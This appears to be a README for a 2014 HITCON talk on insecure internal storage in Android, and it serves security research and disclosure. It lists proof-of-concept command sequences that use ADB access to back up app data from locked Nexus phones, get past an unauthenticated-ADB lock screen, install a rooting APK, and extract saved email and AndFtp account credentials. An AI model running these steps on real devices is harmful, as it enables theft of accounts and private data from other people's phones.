Here're slides and PoC code for the presentation "Insecure Internal Storage in Android" at HITCON 2014 in Taipei.
Nexus 4, Android 4.3, locked, ADB enabled, ADB authed.
$ ./backup.py com.google.android.email
$ ./extract.py
Nexus 5, Android 4.4.2, locked, ADB enabled.
ADB NOT authed.
Internet connected.
$ adb shell
Slide to camera.
$ adb kill-server
$ adb shell
Click screen.
(Optional)
$ adb install tr-mod_signed.apk
$ adb shell am start -n com.geohot.towelroot/.TowelRoot -a android.intent.action.MAIN -c android.intent.category.LAUNCHER
$ adb shell
Nexus 4, Android 4.3, locked, ADB enabled, ADB authed.
Email logined.
$ ./backup.py com.google.android.email
$ ./extract.py
$ ./read_email_account.py
Nexus 4, Android 4.3, locked, ADB enabled, ADB authed.
An account is saved in AndFtp
$ javac AndFtpDecryptor.java
$ ./backup.py lysesoft.andftp
$ ./extract.py
$ ./read_andftp_account.py